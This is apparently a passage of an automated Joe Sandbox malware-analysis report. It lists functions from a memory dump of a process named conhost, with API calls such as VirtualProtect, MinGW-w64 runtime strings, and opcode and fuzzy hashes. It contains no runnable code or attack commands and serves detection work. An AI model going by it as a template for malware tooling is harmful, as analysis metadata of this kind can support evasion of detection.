7ff6b1a244d0-7ff6b1a244e0 698->702 699->686 703 7ff6b1a245b3 699->703 700->672 704 7ff6b1a244ef-7ff6b1a244fc 702->704 705 7ff6b1a244e2-7ff6b1a244ed VirtualProtect 702->705 703->692 704->702 706 7ff6b1a244fe 704->706 705->704 706->634
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: QueryVirtual
                                                                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                              • API String ID: 1804819252-1534286854
                                                                                                              • Opcode ID: ddf683fb2c4f40c3e5fe09b812d31e63a0674634a92dc1432771c13a8722e1b3
                                                                                                              • Instruction ID: f62c33dce4d5bbc6f7550ba04cd4e208e1e0bf29aa22ad39220f5d159be9e22c
                                                                                                              • Opcode Fuzzy Hash: ddf683fb2c4f40c3e5fe09b812d31e63a0674634a92dc1432771c13a8722e1b3
                                                                                                              • Instruction Fuzzy Hash: DF61A272B09752A6E7208B5AF8406B977A4BB49BA8F444136DF4C83795EF3CF486C740

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fwprintf
                                                                                                              • String ID: %*.*S$%-*.*S$%.*S
                                                                                                              • API String ID: 968622242-2115465065
                                                                                                              • Opcode ID: 4dfcc2ef467748f77e863274aff6fa547121581193f0b77d196f1ec3ea372112
                                                                                                              • Instruction ID: 10cb940eb66b2f6d27c4019feaafe29c9196137134a7751a2e5e160f4d6066a1
                                                                                                              • Opcode Fuzzy Hash: 4dfcc2ef467748f77e863274aff6fa547121581193f0b77d196f1ec3ea372112
                                                                                                              • Instruction Fuzzy Hash: DA41B362A1924295F7618B2F94007F96391FF86B98F548136DF0CC7AC5EEBCF4419B80
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$CriticalDeleteSectionfree
                                                                                                              • String ID:
                                                                                                              • API String ID: 2588641659-0
                                                                                                              • Opcode ID: 29640dd68c7ba1592e2369c2e41de76e5c60e6e4c261db454f39358a32bca929
                                                                                                              • Instruction ID: 35a33fda67424e79abb371b55c375f146a2dc40dbf58cadfa21d928f6d00ce04
                                                                                                              • Opcode Fuzzy Hash: 29640dd68c7ba1592e2369c2e41de76e5c60e6e4c261db454f39358a32bca929
                                                                                                              • Instruction Fuzzy Hash: 7431E221E1D603A6EB249B6EF89437927A4AF54799F540037D70EC26B5CF7CB846CB80
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$_assertcalloc
                                                                                                              • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                              • API String ID: 3698345500-799109717
                                                                                                              • Opcode ID: 37db0609889b04363d2d255079679b5b24b326b21e047b837a2877e6e151f1d1
                                                                                                              • Instruction ID: c27719976c1b4145a3820913b71aff0d4678629ff5a0b5aa14e17eabe7e1ed85
                                                                                                              • Opcode Fuzzy Hash: 37db0609889b04363d2d255079679b5b24b326b21e047b837a2877e6e151f1d1
                                                                                                              • Instruction Fuzzy Hash: DB019E71B0D202A6FB558B5AF9506B56295AF48798F844036CF0CC37D5EF3CB982C780
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %*.*s$%-*.*s$%.*s
                                                                                                              • API String ID: 0-4054516066
                                                                                                              • Opcode ID: 58b0edbf565832e46507d36c91100ac30dc2e28087965f61291267d3a9d949e6
                                                                                                              • Instruction ID: 192c2542750001dcf3f53bace2a62643f76521ae52f0edf161197f3e7cd7f15d
                                                                                                              • Opcode Fuzzy Hash: 58b0edbf565832e46507d36c91100ac30dc2e28087965f61291267d3a9d949e6
                                                                                                              • Instruction Fuzzy Hash: 6041A272A1835699E7609F2F84452B97790FF42B9CF58C136CF09CA6C4EE2CB5418F90
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: malloc$abortmemcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4174897659-0
                                                                                                              • Opcode ID: eb34e0a460c61e39b2ff46b28a8e88ec8bd8230ccd31e1d6285dfff70e4d15d0
                                                                                                              • Instruction ID: 252452fa70153acfb542522b333ce4a7ccdc13101215d5e02fcd0aa98e5fa324
                                                                                                              • Opcode Fuzzy Hash: eb34e0a460c61e39b2ff46b28a8e88ec8bd8230ccd31e1d6285dfff70e4d15d0
                                                                                                              • Instruction Fuzzy Hash: BE01E162F0668460EB259B5BE5405FD6260AB95FD8F889132DF1C97781EF3CF982C380
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavecalloc
                                                                                                              • String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
                                                                                                              • API String ID: 876395260-799109717
                                                                                                              • Opcode ID: a40e673a363cf6adf913736d170ab8369f279ba881518402db214ce19748621c
                                                                                                              • Instruction ID: 91fa125a8fa5ce0d514734b638a2bb16b86737fe067eaec8ced3fb774f36e709
                                                                                                              • Opcode Fuzzy Hash: a40e673a363cf6adf913736d170ab8369f279ba881518402db214ce19748621c
                                                                                                              • Instruction Fuzzy Hash: 2E010521B09702A5FB619B9AF9502F526A4AF48B88F844136DB0CC3795EF3CB986C340
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNEL32(00007FF6B1A31C28,00007FF6B1A31080,00007FF6B1A31C20,00007FFB2B31ADA0,?,?,?,00000001,00007FF6B1A2124C), ref: 00007FF6B1A244ED
                                                                                                                • Part of subcall function 00007FF6B1A24130: VirtualQuery.KERNEL32 ref: 00007FF6B1A241DB
                                                                                                              Strings
                                                                                                              • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6B1A24692
                                                                                                              • Unknown pseudo relocation bit size %d., xrefs: 00007FF6B1A2466A
                                                                                                              • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6B1A24683
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$ProtectQuery
                                                                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                              • API String ID: 1027372294-1286557213
                                                                                                              • Opcode ID: a98be8890546a98c645c990d710ee07856811772a68ba184813888094b9e7a20
                                                                                                              • Instruction ID: f20ba1dd4841fb3a5bef769238b2629ad79d1c3f435d8b66e95cf02d4111debd
                                                                                                              • Opcode Fuzzy Hash: a98be8890546a98c645c990d710ee07856811772a68ba184813888094b9e7a20
                                                                                                              • Instruction Fuzzy Hash: 4591C021F18642A6EB208B2AE54067966A5BF45BACF544237CF1D877C9DE3CF841CB80
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Byte$CharLeadMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 2561704868-0
                                                                                                              • Opcode ID: c0eaf304a72f30b6df917a3e8b7a35c21da2a32e642a98cf975b92e1bc5f507b
                                                                                                              • Instruction ID: 3ff654218b97d4e85ab4b99c5cdab33bf68526e35ec4617c6f2bfc5d5d9a3bab
                                                                                                              • Opcode Fuzzy Hash: c0eaf304a72f30b6df917a3e8b7a35c21da2a32e642a98cf975b92e1bc5f507b
                                                                                                              • Instruction Fuzzy Hash: D431B676A0C28196E7604B3AB8003AD7690BB95798F548136EB98C7FD5CF7DE485CB40
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocCreateErrorLastSemaphoreabort
                                                                                                              • String ID:
                                                                                                              • API String ID: 4146797221-0
                                                                                                              • Opcode ID: 68a8cb4a4512b6441f38b26e177b8a661ca8feb00de69cef9e7e75e6fb08b7a2
                                                                                                              • Instruction ID: 4f2aeb6c028877914ebbe5d882aebbbd0564b37f45beffa3af93c2fa5c788d65
                                                                                                              • Opcode Fuzzy Hash: 68a8cb4a4512b6441f38b26e177b8a661ca8feb00de69cef9e7e75e6fb08b7a2
                                                                                                              • Instruction Fuzzy Hash: 5DF05E20E09603A1E728ABAE784467566626F02318F604237D71DC25E1EF3CB1464640
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-3474627141
                                                                                                              • Opcode ID: d4a2256db599fc2d2ca594dcd12f6ce646a9ed308e7e365b5614850625096923
                                                                                                              • Instruction ID: 91f1e5d795e572f0d3f674e5d3946e9735dc0694f328b67257dd9c7d929a2da0
                                                                                                              • Opcode Fuzzy Hash: d4a2256db599fc2d2ca594dcd12f6ce646a9ed308e7e365b5614850625096923
                                                                                                              • Instruction Fuzzy Hash: 6B018262908E8491D7128F1DE8011EA7374FF9D75AF245332EB8C66260DF29E583C740
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4283191376
                                                                                                              • Opcode ID: b1389be86c6671c3615ded8846e1f3a7ce7728f94af0fd5663a83d4c48568bc6
                                                                                                              • Instruction ID: 0b128c4adf85441c16d4836c69cded0a2364415b40b5262cdf379c721789c7a8
                                                                                                              • Opcode Fuzzy Hash: b1389be86c6671c3615ded8846e1f3a7ce7728f94af0fd5663a83d4c48568bc6
                                                                                                              • Instruction Fuzzy Hash: BFF04F52908E4491D7118F1DA8000AAB370FF8E799F285736EB892A565DF28E6828740
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4273532761
                                                                                                              • Opcode ID: bcd97f2aec4024f508f8a8b4b5d64200d04a2d16ae7d13664dc59bd261a7f142
                                                                                                              • Instruction ID: 50d11a3cc029042ed4dc145a78b6efaf8f457dad53ec35417f5faf5ec669fe34
                                                                                                              • Opcode Fuzzy Hash: bcd97f2aec4024f508f8a8b4b5d64200d04a2d16ae7d13664dc59bd261a7f142
                                                                                                              • Instruction Fuzzy Hash: F0F06252908F4491E7118F1DA8000ABB370FF8EB9DF285336EB8D3A565DF28E6828740
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2187435201
                                                                                                              • Opcode ID: e8024487a4fd34e6e3fe3340a1f10a3408645988b8c704b61088cbcf1da6229f
                                                                                                              • Instruction ID: 72f4e0eb48978490de5d6a986d288862f8d7eac2367a9829356d951644e36248
                                                                                                              • Opcode Fuzzy Hash: e8024487a4fd34e6e3fe3340a1f10a3408645988b8c704b61088cbcf1da6229f
                                                                                                              • Instruction Fuzzy Hash: 91F06252908E8491D7118F1DA8000ABB370FF8E79DF285736EB8D3A565DF28E6829740
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-4064033741
                                                                                                              • Opcode ID: 22943b7f8a6a5c4c42ad77948f4bc19c4dc107383bcc4886496fd03ed14152d8
                                                                                                              • Instruction ID: e233429be4d523b5491f2f958aee61a968fecf13d484234931153ad1fc305e0f
                                                                                                              • Opcode Fuzzy Hash: 22943b7f8a6a5c4c42ad77948f4bc19c4dc107383bcc4886496fd03ed14152d8
                                                                                                              • Instruction Fuzzy Hash: D1F06252908E4491D7118F1DA8001BBB370FF8E79DF285736EB8D3A565DF29E6828740
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2468659920
                                                                                                              • Opcode ID: f31004f15eaed393f516e5b9c943ba4295eeb3a33c2ee934347b580dfb7cc1da
                                                                                                              • Instruction ID: 3af83d7ebe54870b29a0ac32629458523178fb22c2cecf2c475264973a8a130e
                                                                                                              • Opcode Fuzzy Hash: f31004f15eaed393f516e5b9c943ba4295eeb3a33c2ee934347b580dfb7cc1da
                                                                                                              • Instruction Fuzzy Hash: F5F06252908E4491D7118F1DA8000ABB370FF8E79DF285336EB8D7A565DF28E6828740
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: fprintf
                                                                                                              • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                              • API String ID: 383729395-2713391170
                                                                                                              • Opcode ID: 07b85231f88bab63e7356351f595d6fd6a34db9b4985474357a4f3ba172ae85f
                                                                                                              • Instruction ID: e4a448b77d9c84e807d21d1dafa63d970e263d83f2ba909b502d3de0cde9c3eb
                                                                                                              • Opcode Fuzzy Hash: 07b85231f88bab63e7356351f595d6fd6a34db9b4985474357a4f3ba172ae85f
                                                                                                              • Instruction Fuzzy Hash: 13F06212804F4481D7018F1DA8000ABB360FF4D799F145726EF883A525DF28E5828740
                                                                                                              APIs
                                                                                                              Memory Dump Source
